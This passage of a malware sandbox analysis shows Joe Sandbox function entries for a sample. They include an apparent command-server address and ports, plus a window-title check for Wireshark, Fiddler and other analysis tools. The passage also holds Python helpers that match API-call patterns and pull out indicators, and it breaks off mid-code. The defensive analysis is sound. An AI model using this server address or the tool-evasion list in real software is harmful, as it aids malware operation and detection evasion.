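def last_call_site(trace, api):
    """Address of the last call to `api` in the trace (to jump to in the dump), or None."""
    hits = [addr for name, _module, addr in trace if name == api]
    return hits[-1] if hits else None


def report(trace):
    """One line per finding, naming the sequence's final call and its address."""
    lines = []
    for name in match_patterns(trace):
        final_api = PATTERNS[name][-1]
        lines.append(f"{name}: ends at {final_api} @ {last_call_site(trace, final_api):#018x}")
    return lines


if __name__ == "__main__":
    for label, trace in (("entry ...D1DF", TRACE_RELAUNCH_AND_SHUTDOWN),
                         ("entry ...D237", TRACE_SHUTDOWN_ONLY),
                         ("control", TRACE_CONTROL)):
        print(label, report(trace) or ["no pattern matched"])
```

The matcher deliberately tolerates intervening calls (GetCurrentProcess, GetLastError, CloseHandle) so that the same pattern fires whether or not the compiler or the author interleaves error handling; tightening it to adjacent calls would miss all three entries above.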
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 0u
                          • API String ID: 0-3203441087
                          • Opcode ID: a50af36ce21d724d32510f30f67425397a92edc2e917600e6b54eddaabb5a364
                          • Instruction ID: a131127682b71e1c971cfde7ebd4d9a972b3b7044b9c3ef003ebae72fb441bc7
                          • Opcode Fuzzy Hash: a50af36ce21d724d32510f30f67425397a92edc2e917600e6b54eddaabb5a364
                          • Instruction Fuzzy Hash: 3A91837051CB488FE768DF28D4457AAB7E1FB98704F10492EE58EC3251DB38E9468B86
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: <
                          • API String ID: 0-4251816714
                          • Opcode ID: 2d6702176b69cc6d6af2b854d888f0dc5976ce2415f525eedc55411690976e19
                          • Instruction ID: 9083c99a5997074d38f6860cfdffa8ff082e8211902815607b0c722edcb3d096
                          • Opcode Fuzzy Hash: 2d6702176b69cc6d6af2b854d888f0dc5976ce2415f525eedc55411690976e19
                          • Instruction Fuzzy Hash: 0851BD31248A088FFB54EF28DC49BA577F2FB99305F50812DE44AC76A0DF39D9468B81
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a9178eafdae48648c701357c9b4d2abeaac436571c9b2d13e72b69692db90ecf
                          • Instruction ID: 2735e11f0debebf2fa7f002991b456f5f3d721e8f9c47271a7cb16ddef2a51fa
                          • Opcode Fuzzy Hash: a9178eafdae48648c701357c9b4d2abeaac436571c9b2d13e72b69692db90ecf
                          • Instruction Fuzzy Hash: 03627C302587898FE769CF1CC5817A5BBE1FB69300F54856DD8CACB742D630E946CBA2
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 85f7673b5705745678ab15cf1bc7445a9931d7babfdc20a30f97ec3237345cf9
                          • Instruction ID: a88bf058367469e8fd2fb594ab275a97a43738abd658ac051545064acad51160
                          • Opcode Fuzzy Hash: 85f7673b5705745678ab15cf1bc7445a9931d7babfdc20a30f97ec3237345cf9
                          • Instruction Fuzzy Hash: 00626930618B858FE769CF1CC481799BBE1FB59300F58856DD8CACB782D670E946CB92
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9ccd6d35c154ce40b5ae276d5133331140d23bdc9e0cb74280d7a7c6ed341ca4
                          • Instruction ID: a00c6419f38f2c0fae92eeb28d7181981e58f5d448799c6b0a251b6a36795e6f
                          • Opcode Fuzzy Hash: 9ccd6d35c154ce40b5ae276d5133331140d23bdc9e0cb74280d7a7c6ed341ca4
                          • Instruction Fuzzy Hash: 8D22C477B785514BD71CCB19E892FA977A2F394308709A52CEA17D3F44DA3DEA06CA00
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_invalid_parameter_noinfo$malloc
                          • String ID:
                          • API String ID: 610097836-0
                          • Opcode ID: e7f111ba5dc29d1d22144977cf958d959f161eb9f5cb80e62a8ccba1b0c60566
                          • Instruction ID: d7cf94b291389d6f1a76a89ac4a008aa67db69bf307a6e39a52366c93c0430ae
                          • Opcode Fuzzy Hash: e7f111ba5dc29d1d22144977cf958d959f161eb9f5cb80e62a8ccba1b0c60566
                          • Instruction Fuzzy Hash: 24F18E31558A48CFF768EF28EC95BA977F1FB95301F10422EA446C65A1DF38DA42CB81
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112008325.000001CFB9300000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9300000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 54a19d4bb2a1054924f4bfc2abc68d4f449b9e1de2d679b882cf74b481fb4666
                          • Instruction ID: 06869663c125a260a12dc0996e0b28d7533fec084504c1edd048595dc3c7dcce
                          • Opcode Fuzzy Hash: 54a19d4bb2a1054924f4bfc2abc68d4f449b9e1de2d679b882cf74b481fb4666
                          • Instruction Fuzzy Hash: 7CE17731658A598BEB68DF64D889BEDB7F5FF58301F14422DE84AC3250DF30EA528781
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112008325.000001CFB9300000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9300000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a66aa8eccb36b3c863fa0cf2326f118ce4658279e53cce5a51b176019e00911a
                          • Instruction ID: 1aeb20cd4cae5365d13f1c0420ca3e24822558dd5ff77a452e4f31a74c402725
                          • Opcode Fuzzy Hash: a66aa8eccb36b3c863fa0cf2326f118ce4658279e53cce5a51b176019e00911a
                          • Instruction Fuzzy Hash: 47D14F31508A488BDF59DF28C889AEAB7E6FF94310F18466DE88AC7155DF30E946CB41
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4f152fd4d6385ee60000525402d296bb86b16f2d3e42963ade6acf54a13ba947
                          • Instruction ID: 93cc55f34d1d1e57989c6639b7d3307c92fb15131f633ada95fc175b28d539ee
                          • Opcode Fuzzy Hash: 4f152fd4d6385ee60000525402d296bb86b16f2d3e42963ade6acf54a13ba947
                          • Instruction Fuzzy Hash: C1C1E034688A498BEB5CDF2CD585BB9B3E2FB59301F10422DD95AC7586DB30ED538B80
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5f9ff294b404581f08feed0f29f9b55a6eb06d3d4334dc09e2da6a0d4b1fcafa
                          • Instruction ID: d9fd2b146fdc10374010290fd528c7d54c6b34b8ff1deafc62c21f5dda2e55ad
                          • Opcode Fuzzy Hash: 5f9ff294b404581f08feed0f29f9b55a6eb06d3d4334dc09e2da6a0d4b1fcafa
                          • Instruction Fuzzy Hash: 53C1C034689E494BEB59DF2CC585BB9B3E2FB95300F10422DE85AD7685DB30ED538B80
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5798e1544e650f95b40f9061c22e2bd83b7a927371cc76c98018ac4bb4a914d0
                          • Instruction ID: f7ee7db15bf166c54128a7d3ef4efab8edb9044c47aa0ac1624b2e6d847f8843
                          • Opcode Fuzzy Hash: 5798e1544e650f95b40f9061c22e2bd83b7a927371cc76c98018ac4bb4a914d0
                          • Instruction Fuzzy Hash: 17A1C43055CA488FEB58EF58D895AEDB7F5FB98300F10422EE44AD71A5DB34DA42CB81
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5e1e48596fdf5ea50ef3df4a9aab293c2a7286e8955242186005ffd8a8896482
                          • Instruction ID: 3f62919d8970f7d0a08257bfe161d7ec301af30aed1d66e0b939c9f9541123c4
                          • Opcode Fuzzy Hash: 5e1e48596fdf5ea50ef3df4a9aab293c2a7286e8955242186005ffd8a8896482
                          • Instruction Fuzzy Hash: 4E71C8347A42854BEB0C8E1CD88577876DAEB8630AB7CE17DDAD7CB247DA30D9438548
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112008325.000001CFB9300000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9300000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2464d5d1c8744b7938e622091fc8299d1c098dc56941e33080af8fbc6eb05a52
                          • Instruction ID: 3db2b33052fde0fa43edc879494603dff5fb9813496a433b66532c84b701a11a
                          • Opcode Fuzzy Hash: 2464d5d1c8744b7938e622091fc8299d1c098dc56941e33080af8fbc6eb05a52
                          • Instruction Fuzzy Hash: 54A13D71508A4C8FDB55EF28C889BEA77F9FB68315F14466EE84AC7160EB30D645CB80
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                           • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5e1e48596fdf5ea50ef3df4a9aab293c2a7286e8955242186005ffd8a8896482
                          • Instruction ID: 394bbdfb1d0ef4576b10af8b2a2a1cffdab4c2b0079e620fe4634424b7e5055a
                          • Opcode Fuzzy Hash: 5e1e48596fdf5ea50ef3df4a9aab293c2a7286e8955242186005ffd8a8896482
                          • Instruction Fuzzy Hash: 42518C72B592A28BE7689F19E404FA83ABAF394341F61903D9A1297A80D775CD52CB00
                          Memory Dump Source
                          • Source File: 00000000.00000002.4113640461.00007FF6F6081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6F6080000, based on PE: true
                           • Associated: 00000000.00000002.4113613717.00007FF6F6080000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.4113640461.00007FF6F6089000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.4113640461.00007FF6F6362000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.4113640461.00007FF6F636B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.4113640461.00007FF6F679E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff6f6080000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7dc9773e29b9943d0f431ef1d083e1a96af14bfd7a0c89f44e59958600268bc4
                          • Instruction ID: 043cbdd95609bf53503799eaa78765c77eeab3109646a951519abc227a61b818
                          • Opcode Fuzzy Hash: 7dc9773e29b9943d0f431ef1d083e1a96af14bfd7a0c89f44e59958600268bc4
                          • Instruction Fuzzy Hash: 52E01287E9EED145F3F3C1740D6A4B81FD49AB250872E4076CA68522E3BC0B2C095A91
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                           • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 615cccabd9d4d4bc56463e44a2cf98717ec8b73547a62705ae19231bf2828f5a
                          • Instruction ID: 35f38df5eac53050f3bddeb35c3dd787ae9c7118b816769d625ba21ced8a3248
                          • Opcode Fuzzy Hash: 615cccabd9d4d4bc56463e44a2cf98717ec8b73547a62705ae19231bf2828f5a
                          • Instruction Fuzzy Hash: D3E046BBF9EED10AF262E21C4C3D74C39B3ABB2701B0C816F8B4117583A2016D168312
                          Memory Dump Source
                          • Source File: 00000000.00000002.4113640461.00007FF6F6081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6F6080000, based on PE: true
                           • Associated: 00000000.00000002.4113613717.00007FF6F6080000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.4113640461.00007FF6F6089000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.4113640461.00007FF6F6362000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.4113640461.00007FF6F636B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.4113640461.00007FF6F679E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff6f6080000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a810e6f4800dd0a946212bf55ce673faa0e725bd5ccdeadf712bf4bae6919595
                          • Instruction ID: 369e92e7905dc00c22c4fd04d7950a57238f435ff72c9bda63cb87be8e8cad93
                          • Opcode Fuzzy Hash: a810e6f4800dd0a946212bf55ce673faa0e725bd5ccdeadf712bf4bae6919595
                          • Instruction Fuzzy Hash: 4BA0022190CE02D0E749CB20EA601342378FB50704FB10131C02DD14F1BF3EB840CB40
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: free$_errno
                          • String ID:
                          • API String ID: 2288870239-0
                          • Opcode ID: e44ab7cd070652d9728940861764d1cd044dd908e6107ce7c6dd1a0b88c044b8
                          • Instruction ID: d583a1da64c24438ad11d688551b85fcbf0b016cac8f14b312dd5ac11abae091
                          • Opcode Fuzzy Hash: e44ab7cd070652d9728940861764d1cd044dd908e6107ce7c6dd1a0b88c044b8
                          • Instruction Fuzzy Hash: E0B184311E564A4BF69DFBA9C5E5BD823B2BF49340F848178980DDA9A7CF149D83C710
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: free$_errno
                          • String ID:
                          • API String ID: 2288870239-0
                          • Opcode ID: e44ab7cd070652d9728940861764d1cd044dd908e6107ce7c6dd1a0b88c044b8
                          • Instruction ID: f63ca0f794c8e79b3fc80069c0ddeecebfad2f862f61cbd0635cd093d1a89677
                          • Opcode Fuzzy Hash: e44ab7cd070652d9728940861764d1cd044dd908e6107ce7c6dd1a0b88c044b8
                          • Instruction Fuzzy Hash: 5EB174301B25884BF689EB24C4E6FDC6376BF4C344F6C41B8985E8A2A7CF119D56C750
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                           • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: free$ErrorFreeHeapLast_errno
                          • String ID:
                          • API String ID: 1012874770-0
                          • Opcode ID: a518f453fd134e221eeb5ca5ef16713add8aa1a07c18d8ee80b660b854a8acdc
                          • Instruction ID: d9448d8b53d0eec757f0990e5ec78e27b6fd24a7b81fdb678c4dc5007ba596b0
                          • Opcode Fuzzy Hash: a518f453fd134e221eeb5ca5ef16713add8aa1a07c18d8ee80b660b854a8acdc
                          • Instruction Fuzzy Hash: A9A1633239159681FA41AAB1C8957ED1733ABC4BC5FC5A136EA4D8A1A7CF10CE4683D0
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                           • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$CloseValue$DeleteOpenSleep_callnewh_errno_invalid_parameter_noinfomallocstd::exception::exception
                          • String ID: 127.0.0.1$206.238.115.146$206.238.115.146$6666$8888$Console$IpDate$o1:$o2:$o3:$p1:$p2:$p3:$t1:$t2:$t3:
                          • API String ID: 2396878867-1516111400
                          • Opcode ID: 463d9f9f0b2c7e549fb2103b7fcfc392be73fd1de31072982d2d55cec7f2432d
                          • Instruction ID: 2a832e874b60e29ea13b82a9d5778c36d30e00db2d1bcabe971504b4adf48633
                          • Opcode Fuzzy Hash: 463d9f9f0b2c7e549fb2103b7fcfc392be73fd1de31072982d2d55cec7f2432d
                          • Instruction Fuzzy Hash: 56C19B71680AD681FB10AB15E694FE82773F754BC8F81912E890A97692DF78CF4BC350
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                           • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Pointer$AddressDecodeEncodeProc$LibraryLoad
                          • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL$ceil
                          • API String ID: 2643518689-1731902841
                          • Opcode ID: 9d3b7b8d73b81e0710393563afef24522285ad24608aa19952dadb9a9b69656c
                          • Instruction ID: 1a90aac00940fdf8f712cad417fef840f8149ec4591fd899211614aa31319cc2
                          • Opcode Fuzzy Hash: 9d3b7b8d73b81e0710393563afef24522285ad24608aa19952dadb9a9b69656c
                          • Instruction Fuzzy Hash: C651B830286BD281FA55AF65F854BD422B3AB59F90F48503E9C0A477A9EF7CCE478314
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                           • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _getptd$BlockUnwind$std::exception::exception$BaseEntryExceptionFunctionImageLookupRaiseThrowtype_info::operator==
                          • String ID: bad exception$csm$csm$csm
                          • API String ID: 1639654010-820278400
                          • Opcode ID: 9b2d5fbee0eac8ee2ac97d402b0da82ebdcc2850a2971d8a2ad8676977ce256d
                          • Instruction ID: 09c98979dec9b4c1623e216d6a9ba9a332d0645a5287a6e6954e25921dbd8374
                          • Opcode Fuzzy Hash: 9b2d5fbee0eac8ee2ac97d402b0da82ebdcc2850a2971d8a2ad8676977ce256d
                          • Instruction Fuzzy Hash: CBE1A8326806828AFB24EF62D044BED77B3F754B88F54413AEE4907B86CB34CA52C305
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _getptd$BlockUnwind$std::exception::exception$BaseImageThrowtype_info::operator==
                          • String ID: csm$csm$csm
                          • API String ID: 3798665358-393685449
                          • Opcode ID: 18458f1114e23ce66089f8be90dc31260b8c4abc6b9c0a44086fbee8cbe3dec9
                          • Instruction ID: ad298549ee715c2c5f184fbb6ef6d234b7b351680c1be230fbbe49245f9a3382
                          • Opcode Fuzzy Hash: 18458f1114e23ce66089f8be90dc31260b8c4abc6b9c0a44086fbee8cbe3dec9
                          • Instruction Fuzzy Hash: 02F19330658A898BFB54AF68C446BEDB3FAFF54310F6C417DE44683192DB24DE428786
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                           • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$CloseHandle$CreateEventLocalOpenSleepTimewsprintf
                          • String ID: %4d.%2d.%2d-%2d:%2d:%2d$Console\1$o1:$p1:$t1:
                          • API String ID: 441366266-1614091359
                          • Opcode ID: 7f9d41e5df0e71293687535cee31a1a5d1087bb8ce378bf28795c0271bedb4fe
                          • Instruction ID: 53135ab5495e0ab8ea7d0900a272c7d5e207cf913509dc17d128fe5a356abc42
                          • Opcode Fuzzy Hash: 7f9d41e5df0e71293687535cee31a1a5d1087bb8ce378bf28795c0271bedb4fe
                          • Instruction Fuzzy Hash: 80A1B572244AC286FB249F25E580BED77B3F785B84F50512ADA4A07B95EF38CB46C740
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                           • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: VisibleWindow
                          • String ID: ApateDNS$Capsa$CurrPorts$Fiddler$Malwarebytes$Metascan$Port$Process$Sniff$TCPEye$TaskExplorer$Wireshark
                          • API String ID: 1208467747-3439171801
                          • Opcode ID: 6b42bebd86f8476637ecc13a6f2ef123198be3f0257b3010f0c26ad4ef994342
                          • Instruction ID: 20e3e29122208959587ecca8d02829c2df11cb786bd823b5ad280cd404fe837d
                          • Opcode Fuzzy Hash: 6b42bebd86f8476637ecc13a6f2ef123198be3f0257b3010f0c26ad4ef994342
                          • Instruction Fuzzy Hash: 0051FE342827DB41FD98AB1AE981BD412B35B557C4F48743EAD4E0679AFB28CF52E300
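                           The two entries above that carry strings are the most useful ones for an analyst: the block whose String ID lists 127.0.0.1, 206.238.115.146, 6666, 8888 and the o1:/p1:/t1: keys reads like a connection configuration, and the block whose API ID is VisibleWindow and whose strings are ApateDNS, Capsa, CurrPorts, Fiddler, Malwarebytes, Metascan, TCPEye, TaskExplorer and Wireshark is a window-title check for analysis tools. The Python below is an added example, not Joe Sandbox code and not code from the analysed sample: it parses the bullet lines exactly as the report prints them, splits the "$"-joined API and String IDs, separates routable IPv4 addresses from loopback/private ones, collects ports only from functions that also carry an IP, and flags functions that pair a window API with a watchlist of tool names. The rule that a new entry begins at each "API ID" line, and the ANALYSIS_TOOLS watchlist (seeded from this sample's own strings), are assumptions of the example, not facts stated by the report; the sample input is the two report entries copied verbatim.

```python
"""Pull indicators out of Joe Sandbox "Similarity" function entries.

Added example, not code from Joe Sandbox or from the analysed sample.  It reads
the bullet lines the report prints for each function ("• API ID:", "• String
ID:", ...) and sorts the "$"-joined strings into routable IPv4 addresses,
candidate ports, and analysis-tool names the sample compares window titles to.
"""
import ipaddress
import re
from typing import Dict, List

# Constructed sample input: the two string-bearing entries copied from the report
# above (connection-configuration block and window-title check block).
SAMPLE_REPORT = """\
• API ID: lstrlen$CloseValue$DeleteOpenSleep_callnewh_errno_invalid_parameter_noinfomallocstd::exception::exception
• String ID: 127.0.0.1$206.238.115.146$206.238.115.146$6666$8888$Console$IpDate$o1:$o2:$o3:$p1:$p2:$p3:$t1:$t2:$t3:
• API String ID: 2396878867-1516111400
• Opcode ID: 463d9f9f0b2c7e549fb2103b7fcfc392be73fd1de31072982d2d55cec7f2432d
• API ID: VisibleWindow
• String ID: ApateDNS$Capsa$CurrPorts$Fiddler$Malwarebytes$Metascan$Port$Process$Sniff$TCPEye$TaskExplorer$Wireshark
• API String ID: 1208467747-3439171801
• Opcode ID: 6b42bebd86f8476637ecc13a6f2ef123198be3f0257b3010f0c26ad4ef994342
"""

# Watchlist of traffic/process analysis tools.  Assumption: seeded from the names
# this sample carries; "Port" and "Process" are too generic to include.
ANALYSIS_TOOLS = {
    "ApateDNS", "Capsa", "CurrPorts", "Fiddler", "Malwarebytes",
    "Metascan", "Sniff", "TCPEye", "TaskExplorer", "Wireshark",
}

# One report bullet: "• <key>: <value>".  Only the keys we care about are kept.
_FIELD = re.compile(
    r"^\s*•\s*(API ID|String ID|API String ID|Opcode ID|Instruction ID):\s*(.*?)\s*$"
)


def parse_similarity_entries(text: str) -> List[dict]:
    """Group bullet lines into entries; each "API ID" line opens a new one."""
    entries: List[dict] = []
    for line in text.splitlines():
        m = _FIELD.match(line)
        if not m:
            continue
        key, value = m.group(1), m.group(2)
        if key == "API ID":
            entries.append({})
        if not entries:  # a field before any "API ID" belongs to nothing
            continue
        if key in ("API ID", "String ID"):
            # Joe Sandbox joins the individual items with "$"; drop empties.
            entries[-1][key] = [v for v in value.split("$") if v]
        else:
            entries[-1][key] = value
    return entries


def extract_network_iocs(entries: List[dict]) -> Dict[str, list]:
    """Split IPv4 strings into routable / non-routable and collect ports.

    A purely numeric string counts as a port only when the same function also
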